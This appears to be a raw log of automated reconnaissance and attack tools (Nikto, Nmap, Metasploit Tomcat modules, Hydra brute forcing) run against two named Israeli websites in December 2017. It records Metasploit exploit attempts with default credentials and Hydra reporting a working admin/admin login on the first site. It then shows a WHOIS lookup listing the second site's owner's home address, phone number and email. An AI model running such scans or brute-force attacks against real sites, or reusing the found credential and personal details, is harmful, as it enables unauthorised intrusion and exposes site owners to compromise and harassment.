Number of requests: 1

[1m[34mhttp://flybox.co.il:8080[0m [523 Unassigned] [1m[37mCloudFlare[0m, [1m[37mCookies[0m[[37m__cfduid,cf_ob_info,cf_use_ob[0m], [1m[37mCountry[0m[[37mUNITED STATES[0m][[1m[31mUS[0m], [1m[37mHTML5[0m, [1m[37mHTTPServer[0m[[1m[36mcloudflare[0m], [1m[37mHttpOnly[0m[[37m__cfduid[0m], [1m[37mIP[0m[[37m104.31.75.239[0m], [1m[37mJQuery[0m, [1m[37mScript[0m[[37mtext/javascript[0m], [1m[37mTitle[0m[[1m[33mflybox.co.il | 523: Origin is unreachable[0m], [1m[37mUncommonHeaders[0m[[37mcf-ray[0m], [1m[37mX-Frame-Options[0m[[37mSAMEORIGIN[0m], [1m[37mX-UA-Compatible[0m[[37mIE=Edge[0m]


[94m	__  ______ _____ [0m
[94m	\ \/ / ___|_   _|[0m
[94m	 \  /\___ \ | |  [0m
[94m	 /  \ ___) || |  [0m
[94m	/_/\_|____/ |_|  [0m

[94m+ -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield[0m
[94m+ -- --=[Target: flybox.co.il:8080[0m
[92m+ -- --=[Site not vulnerable to Cross-Site Tracing![0m
[92m+ -- --=[Site not vulnerable to Host Header Injection![0m
[92m+ -- --=[Site not vulnerable to Cross-Frame Scripting![0m
[92m+ -- --=[Site not vulnerable to Clickjacking![0m

[93mHTTP/1.1 405 Not Allowed
Date: Sun, 31 Dec 2017 10:29:55 GMT
Content-Type: text/html
Content-Length: 177
Connection: close
Server: cloudflare-nginx
CF-RAY: -

<html>
<head><title>405 Not Allowed</title></head>
<body bgcolor="white">
<center><h1>405 Not Allowed</h1></center>
<hr><center>cloudflare-nginx</center>
</body>
</html>
[0m
[93mHTTP/1.1 523 Origin Unreachable
Date: Sun, 31 Dec 2017 10:29:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d23ab0e266a46bb002f6d1ad600a8e45e1514716196; expires=Mon, 31-Dec-18 10:29:56 GMT; path=/; domain=.flybox.co.il; HttpOnly
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Set-Cookie: cf_use_ob=8080; expires=Sun, 31-Dec-17 10:30:26 GMT; path=/
Set-Cookie: cf_ob_info=523:3d5c8f82b55969a6:CDG; expires=Sun, 31-Dec-17 10:30:26 GMT; path=/
Server: cloudflare
CF-RAY: 3d5c8f82b55969a6-CDG

1614
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<meta [0m


Version: [32m1.11.10-static[0m
OpenSSL 1.0.2-chacha (1.0.2g-dev)
[0m
Testing SSL server [32mflybox.co.il[0m on port [32m8080[0m using SNI name [32mflybox.co.il[0m

  [1;34mTLS Fallback SCSV:[0m
Server [31mdoes not[0m support TLS Fallback SCSV

  [1;34mTLS renegotiation:[0m
Session renegotiation [32mnot supported[0m

  [1;34mTLS Compression:[0m
Compression [32mdisabled[0m

  [1;34mHeartbleed:[0m
TLS 1.2 [32mnot vulnerable[0m to heartbleed
TLS 1.1 [32mnot vulnerable[0m to heartbleed
TLS 1.0 [32mnot vulnerable[0m to heartbleed

  [1;34mSupported Server Cipher(s):[0m
 ââââ âââââ âââ        ââââââ   ââââââ  ââââ    âââ    ââââââ ââââââ âââââââ [0m
âââââââ âââââââââ    âââ    â âââ    â âââââââ ââââ    ââ   â ââ   â ââââ âââ[0m
âââ    âââââââ  âââ  â ââââ   â ââââ   ââââ âââââââ    ââââ   ââââ   âââ   ââ[0m
âââ    âââ âââââââââ   â   âââ  â   âââââââââ  ââââ    âââ  â âââ  â ââââ   â[0m
ââââ   ââââ ââ   âââââââââââââââââââââââââ  ââââââââââââââââââââââââââââââââ [0m
â ââ   â  â ââ   âââââ âââ â ââ âââ â ââââââââââ âââ  âââ ââ âââ ââ â âââ  â [0m
â  â      â  â   ââ ââ ââ  â ââ ââ  â ââââ   â â â â  â â â  â â â  â â â  â [0m
â      â     â   â   â  â  â  â  â  â   â    â   â â      â      â    â â  â [0m
       â         â  â      â        â   â          â  â   â  â   â  â   â    [0m
                                             â                        â      [0m
[91m+ -- --=[MÃÅÅBÄ»ÃÃÄ V20160303 BÅž 1Å3 @ ÄÅÃÅŽÄÅÈÃÃÄ»Ä - https://crowdshield.com[0m
[91m+ -- --=[Scan Complete![0m
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          104.31.75.239
+ Target Hostname:    flybox.co.il
+ Target Port:        8080
+ Start Time:         2017-12-31 05:29:58 (GMT-5)
---------------------------------------------------------------------------
+ Server: cloudflare
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'cf-ray' found, with contents: 3d5c8f9133b91043-CDG
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ Server banner has changed from 'cloudflare' to 'cloudflare-nginx' which may suggest a WAF, load balancer or proxy is in place
+ Scan terminated:  17 error(s) and 3 item(s) reported on remote host
+ End Time:           2017-12-31 07:29:00 (GMT-5) (7142 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-31 07:29 EST
Nmap scan report for flybox.co.il (104.31.75.239)
Host is up (2.8s latency).
Other addresses for flybox.co.il (not scanned): 2400:cb00:2048:1::681f:4aef 2400:cb00:2048:1::681f:4bef 104.31.74.239

PORT     STATE    SERVICE    VERSION
8080/tcp filtered http-proxy
Too many fingerprints match this host to give specific OS details
Network Distance: 9 hops

TRACEROUTE (using proto 1/icmp)
HOP RTT        ADDRESS
1   2780.34 ms 10.13.0.1
2   2794.33 ms 37.187.24.253
3   2787.36 ms 10.50.225.60
4   2790.85 ms 10.17.129.42
5   2783.87 ms 10.73.0.54
6   ...
7   2801.39 ms be100-1110.th2-1-a9.fr.eu (213.186.32.215)
8   ...
9   2799.89 ms 104.31.75.239

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.58 seconds
[0m[36m[0m[37m
Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018   es: 0018  ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)

[1m
Stack: 90909090990909090990909090
       90909090990909090990909090
       90909090.90909090.90909090
       90909090.90909090.90909090
       90909090.90909090.09090900
       90909090.90909090.09090900
       ..........................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ccccccccc.................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       .................ccccccccc
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ..........................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffff..................
       ffffffff..................
[0m

[33mCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00[0m
Aiee, Killing Interrupt handler
[31mKernel panic: Attempted to kill the idle task!
In swapper task - not syncing[0m
[0m

       =[ [33mmetasploit v4.16.26-dev[0m                         ]
+ -- --=[ 1714 exploits - 975 auxiliary - 300 post        ]
+ -- --=[ 507 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[0m[0mRHOST => flybox.co.il
[0m[1m[31m[-][0m WAR file not found
[1m[34m[*][0m Auxiliary module execution completed
[0m[0mRHOSTS => flybox.co.il
[0m[1m[33m[!][0m RHOST is not a valid option for this module. Did you mean RHOSTS?
RHOST => flybox.co.il
[0mRPORT => 8080
[0m[1m[34m[*][0m Scanned 1 of 4 hosts (25% complete)
[1m[34m[*][0m Scanned 2 of 4 hosts (50% complete)
[1m[34m[*][0m Scanned 3 of 4 hosts (75% complete)
[1m[34m[*][0m Scanned 4 of 4 hosts (100% complete)
[1m[34m[*][0m Auxiliary module execution completed
[0m[0m[1m[34m[*][0m Attempting to connect to 2400:cb00:2048:1::681f:4aef:8080
[1m[32m[+][0m No File(s) found
[1m[34m[*][0m Scanned 1 of 4 hosts (25% complete)
[1m[34m[*][0m Attempting to connect to 2400:cb00:2048:1::681f:4bef:8080
[1m[32m[+][0m No File(s) found
[1m[34m[*][0m Scanned 2 of 4 hosts (50% complete)
[1m[34m[*][0m Attempting to connect to 104.31.75.239:8080
[1m[32m[+][0m No File(s) found
[1m[34m[*][0m Scanned 3 of 4 hosts (75% complete)
[1m[34m[*][0m Attempting to connect to 104.31.74.239:8080
[1m[32m[+][0m No File(s) found
[1m[34m[*][0m Scanned 4 of 4 hosts (100% complete)
[1m[34m[*][0m Auxiliary module execution completed
[0m[0m[1m[34m[*][0m http://[2400:cb00:2048:1::681f:4aef]:8080/admin/j_security_check - Checking j_security_check...
[1m[34m[*][0m http://[2400:cb00:2048:1::681f:4aef]:8080/admin/j_security_check - Server returned: 403
[1m[31m[-][0m http://[2400:cb00:2048:1::681f:4aef]:8080/admin/j_security_check - Unable to enumerate users with this URI
[1m[34m[*][0m Scanned 1 of 4 hosts (25% complete)
[1m[34m[*][0m http://[2400:cb00:2048:1::681f:4bef]:8080/admin/j_security_check - Checking j_security_check...
[1m[34m[*][0m http://[2400:cb00:2048:1::681f:4bef]:8080/admin/j_security_check - Server returned: 403
[1m[31m[-][0m http://[2400:cb00:2048:1::681f:4bef]:8080/admin/j_security_check - Unable to enumerate users with this URI
[1m[34m[*][0m Scanned 2 of 4 hosts (50% complete)
[1m[34m[*][0m http://104.31.75.239:8080/admin/j_security_check - Checking j_security_check...
[1m[34m[*][0m Scanned 3 of 4 hosts (75% complete)
[1m[34m[*][0m http://104.31.74.239:8080/admin/j_security_check - Checking j_security_check...
[1m[31m[-][0m http://104.31.74.239:8080/admin/j_security_check - Unable to enumerate users with this URI
[1m[34m[*][0m Scanned 4 of 4 hosts (100% complete)
[1m[34m[*][0m Auxiliary module execution completed
[0m[0m[1m[31m[-][0m http://2400:cb00:2048:1::681f:4aef:8080 - Authorization not requested
[1m[34m[*][0m Scanned 1 of 4 hosts (25% complete)
[1m[31m[-][0m http://2400:cb00:2048:1::681f:4bef:8080 - Authorization not requested
[1m[34m[*][0m Scanned 2 of 4 hosts (50% complete)
[1m[31m[-][0m http://104.31.75.239:8080/manager/html - No response
[1m[34m[*][0m Scanned 3 of 4 hosts (75% complete)
[1m[31m[-][0m http://104.31.74.239:8080/manager/html - No response
[1m[34m[*][0m Scanned 4 of 4 hosts (100% complete)
[1m[34m[*][0m Auxiliary module execution completed
[0m[0m[1m[31m[-][0m Exploit aborted due to failure: not-found: The target server fingerprint "cloudflare-nginx ( 403-Forbidden )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
[1m[34m[*][0m Exploit completed, but no session was created.
[0m[0mUSERNAME => tomcat
[0mPASSWORD => tomcat
[0m[1m[31m[-][0m Exploit aborted due to failure: not-found: The target server fingerprint "cloudflare-nginx ( 403-Forbidden )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
[1m[34m[*][0m Exploit completed, but no session was created.
[0m[91m + -- --=[Port 8180 closed... skipping.[0m
[93m + -- --=[Port 8443 opened... running tests...[0m

                                 ^     ^
        _   __  _   ____ _   __  _    _   ____
       ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
      | V V // o // _/ | V V // 0 // 0 // _/
      |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
                                <
                                 ...'

    WAFW00F - Web Application Firewall Detection Tool

    By Sandro Gauci && Wendel G. Henrique

Checking http://flybox.co.il:8443
The site http://flybox.co.il:8443 is behind a CloudFlare
Number of requests: 1

[1m[34mhttp://flybox.co.il:8443[0m [400 Bad Request] [1m[37mCloudFlare[0m, [1m[37mCountry[0m[[37mUNITED STATES[0m][[1m[31mUS[0m], [1m[37mHTTPServer[0m[[1m[36mcloudflare-nginx[0m], [1m[37mIP[0m[[37m104.31.74.239[0m], [1m[37mTitle[0m[[1m[33m400 The plain HTTP request was sent to HTTPS port[0m], [1m[37mUncommonHeaders[0m[[37mcf-ray[0m]


[94m	__  ______ _____ [0m
[94m	\ \/ / ___|_   _|[0m
[94m	 \  /\___ \ | |  [0m
[94m	 /  \ ___) || |  [0m
[94m	/_/\_|____/ |_|  [0m

[94m+ -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield[0m
[94m+ -- --=[Target: flybox.co.il:8443[0m
Version: [32m1.11.10-static[0m
OpenSSL 1.0.2-chacha (1.0.2g-dev)
[0m
Testing SSL server [32mflybox.co.il[0m on port [32m8443[0m using SNI name [32mflybox.co.il[0m

  [1;34mTLS Fallback SCSV:[0m
Server [31mdoes not[0m support TLS Fallback SCSV

  [1;34mTLS renegotiation:[0m
[32mSecure[0m session renegotiation supported

  [1;34mTLS Compression:[0m
Compression [32mdisabled[0m

  [1;34mHeartbleed:[0m
TLS 1.2 [32mnot vulnerable[0m to heartbleed
TLS 1.1 [32mnot vulnerable[0m to heartbleed
TLS 1.0 [32mnot vulnerable[0m to heartbleed

  [1;34mSupported Server Cipher(s):[0m
[32mPreferred[0m TLSv1.2  [32m256[0m bits  [32mECDHE-ECDSA-CHACHA20-POLY1305[0m Curve P-256 DHE 256
Accepted  TLSv1.2  [32m128[0m bits  [32mECDHE-ECDSA-AES128-GCM-SHA256[0m Curve P-256 DHE 256
Accepted  TLSv1.2  [32m128[0m bits  ECDHE-ECDSA-AES128-SHA        Curve P-256 DHE 256
Accepted  TLSv1.2  [32m128[0m bits  ECDHE-ECDSA-AES128-SHA256     Curve P-256 DHE 256
Accepted  TLSv1.2  [32m256[0m bits  [32mECDHE-ECDSA-AES256-GCM-SHA384[0m Curve P-256 DHE 256
Accepted  TLSv1.2  [32m256[0m bits  ECDHE-ECDSA-AES256-SHA        Curve P-256 DHE 256
Accepted  TLSv1.2  [32m256[0m bits  ECDHE-ECDSA-AES256-SHA384     Curve P-256 DHE 256
[32mPreferred[0m TLSv1.1  [32m128[0m bits  ECDHE-ECDSA-AES128-SHA        Curve P-256 DHE 256
Accepted  TLSv1.1  [32m256[0m bits  ECDHE-ECDSA-AES256-SHA        Curve P-256 DHE 256
[32mPreferred[0m [33mTLSv1.0[0m  [32m128[0m bits  ECDHE-ECDSA-AES128-SHA        Curve P-256 DHE 256
Accepted  [33mTLSv1.0[0m  [32m256[0m bits  ECDHE-ECDSA-AES256-SHA        Curve P-256 DHE 256

  [1;34mSSL Certificate:[0m
Signature Algorithm: ecdsa-with-SHA256
Subject:  sni165065.cloudflaressl.com
Altnames: DNS:sni165065.cloudflaressl.com, DNS:*.aonlineorder.tk, DNS:*.bestproductthisyear.tk, DNS:*.bigsale135store.tk, DNS:*.bigsale171store.tk, DNS:*.bigsale215store.tk, DNS:*.bigsale248store.tk, DNS:*.bigsale281store.tk, DNS:*.bjfhiu.tk, DNS:*.bsmartbuyer.tk, DNS:*.bsmartonlineshop.tk, DNS:*.btokoonlinemurah.tk, DNS:*.budgettrouwfilm.nl, DNS:*.dbranded.tk, DNS:*.eawesomemarket.tk, DNS:*.emmom.tk, DNS:*.flybox.co.il, DNS:*.fmarketplus.tk, DNS:*.ftopbuy.tk, DNS:*.h1xv9oacp.ga, DNS:*.ialliexpress.tk, DNS:*.iowist.com, DNS:*.ipaytoko.tk, DNS:*.iperfectmarket.tk, DNS:*.ismartxpress.tk, DNS:*.jsmartonlineshop.tk, DNS:*.jtopcharts.tk, DNS:*.lalliexpress.tk, DNS:*.lpayperclick.tk, DNS:*.lpremiumonlineshop.tk, DNS:*.onlinekanyakumari.com, DNS:*.osmartbuyer.tk, DNS:*.pawesomemarket.tk, DNS:*.pbelimudah.tk, DNS:*.rlinkaliexpress.tk, DNS:*.rnesaliexpress.tk, DNS:*.samriddle.website, DNS:*.snapcracka.us, DNS:*.stokoonlinemurah.tk, DNS:*.taeaj.tk, DNS:*.techxpertsllc.com, DNS:*.vbrs.co.uk, DNS:*.wholesaleonline114.tk, DNS:*.wholesaleonline4.tk, DNS:*.wholesaleonline55.tk, DNS:*.wittcatt.stream, DNS:aonlineorder.tk, DNS:bestproductthisyear.tk, DNS:bigsale135store.tk, DNS:bigsale171store.tk, DNS:bigsale215store.tk, DNS:bigsale248store.tk, DNS:bigsale281store.tk, DNS:bjfhiu.tk, DNS:bsmartbuyer.tk, DNS:bsmartonlineshop.tk, DNS:btokoonlinemurah.tk, DNS:budgettrouwfilm.nl, DNS:dbranded.tk, DNS:eawesomemarket.tk, DNS:emmom.tk, DNS:flybox.co.il, DNS:fmarketplus.tk, DNS:ftopbuy.tk, DNS:h1xv9oacp.ga, DNS:ialliexpress.tk, DNS:iowist.com, DNS:ipaytoko.tk, DNS:iperfectmarket.tk, DNS:ismartxpress.tk, DNS:jsmartonlineshop.tk, DNS:jtopcharts.tk, DNS:lalliexpress.tk, DNS:lpayperclick.tk, DNS:lpremiumonlineshop.tk, DNS:onlinekanyakumari.com, DNS:osmartbuyer.tk, DNS:pawesomemarket.tk, DNS:pbelimudah.tk, DNS:rlinkaliexpress.tk, DNS:rnesaliexpress.tk, DNS:samriddle.website, DNS:snapcracka.us, DNS:stokoonlinemurah.tk, DNS:taeaj.tk, DNS:techxpertsllc.com, DNS:vbrs.co.uk, DNS:wholesaleonline114.tk, DNS:wholesaleonline4.tk, DNS:wholesaleonline55.tk, DNS:wittcatt.stream
Issuer:   COMODO ECC Domain Validation Secure Server CA 2

Not valid before: [32mDec 17 00:00:00 2017 GMT[0m
Not valid after:  [32mJun 25 23:59:59 2018 GMT[0m
 ââââ âââââ âââ        ââââââ   ââââââ  ââââ    âââ    ââââââ ââââââ âââââââ [0m
âââââââ âââââââââ    âââ    â âââ    â âââââââ ââââ    ââ   â ââ   â ââââ âââ[0m
âââ    âââââââ  âââ  â ââââ   â ââââ   ââââ âââââââ    ââââ   ââââ   âââ   ââ[0m
âââ    âââ âââââââââ   â   âââ  â   âââââââââ  ââââ    âââ  â âââ  â ââââ   â[0m
ââââ   ââââ ââ   âââââââââââââââââââââââââ  ââââââââââââââââââââââââââââââââ [0m
â ââ   â  â ââ   âââââ âââ â ââ âââ â ââââââââââ âââ  âââ ââ âââ ââ â âââ  â [0m
â  â      â  â   ââ ââ ââ  â ââ ââ  â ââââ   â â â â  â â â  â â â  â â â  â [0m
â      â     â   â   â  â  â  â  â  â   â    â   â â      â      â    â â  â [0m
       â         â  â      â        â   â          â  â   â  â   â  â   â    [0m
                                             â                        â      [0m
[91m+ -- --=[MÃÅÅBÄ»ÃÃÄ V20160303 BÅž 1Å3 @ ÄÅÃÅŽÄÅÈÃÃÄ»Ä - https://crowdshield.com[0m
[91m+ -- --=[Scan Complete![0m
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          104.31.75.239
+ Target Hostname:    flybox.co.il
+ Target Port:        8443
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /OU=Domain Control Validated/OU=PositiveSSL Multi-Domain/CN=sni165065.cloudflaressl.com
                   Ciphers:  ECDHE-ECDSA-CHACHA20-POLY1305
                   Issuer:   /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO ECC Domain Validation Secure Server CA 2
+ Start Time:         2017-12-31 07:35:44 (GMT-5)
---------------------------------------------------------------------------
+ Server: cloudflare
+ Cookie __cfduid created without the secure flag
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'cf-ray' found, with contents: 3d5d47cf2eb2472e-EWR
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ Hostname 'flybox.co.il' does not match certificate's names: sni165065.cloudflaressl.com
+ Scan terminated:  20 error(s) and 6 item(s) reported on remote host
+ End Time:           2017-12-31 07:44:35 (GMT-5) (531 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-31 07:44 EST
Nmap scan report for flybox.co.il (104.31.74.239)
Host is up (0.15s latency).
Other addresses for flybox.co.il (not scanned): 2400:cb00:2048:1::681f:4aef 2400:cb00:2048:1::681f:4bef 104.31.75.239

PORT     STATE    SERVICE   VERSION
8443/tcp filtered https-alt
Too many fingerprints match this host to give specific OS details
Network Distance: 9 hops

TRACEROUTE (using proto 1/icmp)
HOP RTT      ADDRESS
1   45.65 ms 10.13.0.1
2   45.70 ms 37.187.24.253
3   45.66 ms 10.50.225.60
4   45.71 ms 10.17.129.40
5   45.62 ms 10.73.0.50
6   45.72 ms 10.95.33.10
7   59.64 ms be100-1110.th2-1-a9.fr.eu (213.186.32.215)
8   59.62 ms cloudflare.par.franceix.net (37.49.237.49)
9   59.57 ms 104.31.74.239

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.83 seconds
[91m + -- --=[Port 8888 closed... skipping.[0m
[91m + -- --=[Port 10000 closed... skipping.[0m
[91m + -- --=[Port 16992 closed... skipping.[0m
[91m + -- --=[Port 27017 closed... skipping.[0m
[91m + -- --=[Port 27018 closed... skipping.[0m
[91m + -- --=[Port 27019 closed... skipping.[0m
[91m + -- --=[Port 28017 closed... skipping.[0m
[91m + -- --=[Port 49152 closed... skipping.[0m
[92m + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +[0m
[92m + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +[0m
[92m + -- ----------------------------=[Running Brute Force]=--------------------- -- +[0m
[91m __________                __         ____  ___[0m
[91m \______   \_______ __ ___/  |_  ____ \   \/  /[0m
[91m  |    |  _/\_  __ \  |  \   __\/ __ \ \     / [0m
[91m  |    |   \ |  | \/  |  /|  | \  ___/ /     \ [0m
[91m  |______  / |__|  |____/ |__|  \___  >___/\  \ [0m
[91m         \/                         \/      \_/[0m

[91m + -- --=[BruteX v1.7 by 1N3[0m
[91m + -- --=[http://crowdshield.com[0m


[92m################################### Running Port Scan ##############################[0m

Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-31 07:44 EST
Nmap scan report for flybox.co.il (104.31.74.239)
Host is up (0.64s latency).
Other addresses for flybox.co.il (not scanned): 2400:cb00:2048:1::681f:4aef 2400:cb00:2048:1::681f:4bef 104.31.75.239
Not shown: 23 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 14.17 seconds

[92m################################### Running Brute Force ############################[0m

[91m + -- --=[Port 21 closed... skipping.[0m
[91m + -- --=[Port 22 closed... skipping.[0m
[91m + -- --=[Port 23 closed... skipping.[0m
[91m + -- --=[Port 25 closed... skipping.[0m
[92m + -- --=[Port 80 opened... running tests...[0m
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-12-31 07:45:09
[DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
[DATA] attacking http-get://flybox.co.il:80//
[80][http-get] host: flybox.co.il   login: admin   password: admin
[STATUS] attack finished for flybox.co.il (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-12-31 07:45:13
[91m + -- --=[Port 110 closed... skipping.[0m
[91m + -- --=[Port 139 closed... skipping.[0m
[91m + -- --=[Port 162 closed... skipping.[0m
[91m + -- --=[Port 389 closed... skipping.[0m
[92m + -- --=[Port 443 opened... running tests...[0m
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-12-31 07:45:13
[DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
[DATA] attacking http-gets://flybox.co.il:443//
[443][http-get] host: flybox.co.il   login: admin   password: admin
[STATUS] attack finished for flybox.co.il (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-12-31 07:45:18
[91m + -- --=[Port 445 closed... skipping.[0m
[91m + -- --=[Port 512 closed... skipping.[0m
[91m + -- --=[Port 513 closed... skipping.[0m
[91m + -- --=[Port 514 closed... skipping.[0m
[91m + -- --=[Port 993 closed... skipping.[0m
[91m + -- --=[Port 1433 closed... skipping.[0m
[91m + -- --=[Port 1521 closed... skipping.[0m
[91m + -- --=[Port 3306 closed... skipping.[0m
[91m + -- --=[Port 3389 closed... skipping.[0m
[91m + -- --=[Port 5432 closed... skipping.[0m
[91m + -- --=[Port 5900 closed... skipping.[0m
[91m + -- --=[Port 5901 closed... skipping.[0m
[91m + -- --=[Port 8000 closed... skipping.[0m
[92m + -- --=[Port 8080 opened... running tests...[0m
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-12-31 07:45:18
[91m + -- --=[Port 8100 closed... skipping.[0m
[91m + -- --=[Port 6667 closed... skipping.[0m
#######################################################################################################################################
Hostname 	www.doctorarik.co.il 	  	ISP 	Bezeq International (AS8551)
Continent 	Asia 	  	Flag
IL
Country 	Israel 	  	Country Code 	IL (ISR)
Region 	Unknown 	  	Local time 	31 Dec 2017 06:09 IST
City 	Unknown 	  	Latitude 	31.5
IP Address 	62.219.91.10 	  	Longitude 	34.75
#######################################################################################################################################
[i] Scanning Site: http://doctorarik.co.il


B A S I C   I N F O
====================


[+] Site Title: הרזיה, הרזיה בריאה, הרזיה נכונה- מרפאת הרזיה של ד"ר אריק ויסבורד
[+] IP address: 62.219.91.10
[+] Web Server: Microsoft-IIS/7.5
[+] CMS: WordPress
[+] Cloudflare: Not Detected
[+] Robots File: Could NOT Find robots.txt!


W H O I S   L O O K U P
========================


% The data in the WHOIS database of the .il registry is provided
% by ISOC-IL for information purposes, and to assist persons in
% obtaining information about or related to a domain name
% registration record. ISOC-IL does not guarantee its accuracy.
% By submitting a WHOIS query, you agree that you will use this
% Data only for lawful purposes and that, under no circumstances
% will you use this Data to: (1) allow, enable, or otherwise
% support the transmission of mass unsolicited, commercial
% advertising or solicitations via e-mail (spam);
% or  (2) enable high volume, automated, electronic processes that
% apply to ISOC-IL (or its systems).
% ISOC-IL reserves the right to modify these terms at any time.
% By submitting this query, you agree to abide by this policy.

query:        doctorarik.co.il

reg-name:     doctorarik
domain:       doctorarik.co.il

descr:        Arik Weisbord
descr:        A.D. Gordon 14
descr:        Herzelya
descr:        4643301
descr:        Israel
phone:        +972 54 4277997
fax-no:       +972 9 9552093
e-mail:       drarik AT netvision.net.il
admin-c:      DT-AW7749-IL
tech-c:       DT-AW7749-IL
zone-c:       DT-AW7749-IL
nserver:      ns1.dtnt.info
nserver:      ns2.dtnt.info
validity:     03-04-2018
DNSSEC:       unsigned
status:       Transfer Locked
changed:      domain-registrar AT isoc.org.il 20160403 (Assigned)

person:       Arik Weisbord
address:      Arik Weisbord
address:      A.D. Gordon 14
address:      Herzelya
address:      4643301
address:      Israel
phone:        +972 54 4277997
fax-no:       +972 9 9552093
e-mail:       drarik AT netvision.net.il
nic-hdl:      DT-AW7749-IL
changed:      domain-registrar AT isoc.org.il 20160403

registrar name: Domain The Net Technologies Ltd
registrar info: http://www.domainthenet.com

% Rights to the data above are restricted by copyright.


G E O  I P  L O O K  U P
=========================

[i] IP Address: 62.219.91.10
[i] Country: IL
[i] State: N/A
[i] City: N/A
[i] Latitude: 31.500000
[i] Longitude: 34.750000


H T T P   H E A D E R S
=======================


[i]  HTTP/1.1 301 Moved Permanently
[i]  Content-Type: text/html; charset=UTF-8
[i]  Location: http://www.doctorarik.co.il/
[i]  Server: Microsoft-IIS/7.5
[i]  X-Powered-By: ASP.NET
[i]  X-Powered-By-Plesk: PleskWin
[i]  Date: Sun, 31 Dec 2017 04:17:21 GMT
[i]  Connection: close
[i]  Content-Length: 151
[i]  HTTP/1.1 200 OK
[i]  Content-Type: text/html; charset=UTF-8
[i]  Server: Microsoft-IIS/7.5
[i]  X-Pingback: http://www.doctorarik.co.il/xmlrpc.php
[i]  Set-Cookie: PHPSESSID=009994e511dd64fd22a381fed060f747; path=/
[i]  X-Powered-By: ASP.NET
[i]  X-Powered-By-Plesk: PleskWin
[i]  Date: Sun, 31 Dec 2017 04:17:22 GMT
[i]  Connection: close
[i]  Content-Length: 19894


D N S   L O O K U P
===================

doctorarik.co.il.	10799	IN	A	62.219.91.10
doctorarik.co.il.	10799	IN	MX	10 mail.doctorarik.co.il.
doctorarik.co.il.	10799	IN	MX	50 mail.dtnt.info.
doctorarik.co.il.	10799	IN	SOA	ns1.dtnt.info.doctorarik.co.il. support.dtnt.com.doctorarik.co.il. 2015040700 5400 3600 2419199 3600
doctorarik.co.il.	21599	IN	NS	ns1.dtnt.info.
doctorarik.co.il.	21599	IN	NS	ns3.dtnt.info.
